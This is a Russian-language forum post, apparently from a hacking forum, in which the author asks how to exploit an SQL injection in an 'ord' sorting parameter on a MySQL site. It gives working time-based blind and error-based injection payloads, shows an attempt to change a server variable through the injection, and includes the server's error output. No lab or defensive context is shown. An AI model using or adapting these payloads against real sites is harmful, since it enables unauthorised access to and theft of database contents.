Столкнулся с проблемой
есть скуля
&ordtype=name&ord=,sleep(IF(ASCII(substr((select+1 +from+user),1,1))=123,1,0))
проблема в том что скрипт переводит таблицу user в верхний регистр USER и в итоге
Invalid query: Table 'db.USER' doesn't exist
пробывал
&ordtype=тфьу&ord=,sleep(IF(ASCII(substr((set+ @@global.lower_case_table_names=1),1,1))=123,1,0))
но ошибка
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SET @@GLOBAL.LOWER_CASE_TABLE_NAMES=1),10,1))=48,1,0)) ' at line 9
как можно обойти перевод в верхний регистр или заставить поменять системную переменную?
и еще раз тут есть вывод ошибок то наверное можно выводить через error-based но не выходит(
upd:
с error-based разобрадся. получилось
Код:
&ordtype=name&ord=,(select+1+from+information_schema.tables+group+by+concat((select+1),floor(rand(0)*2))+having+min(0))
, но так и не могу обойти перевод в верхний регистр(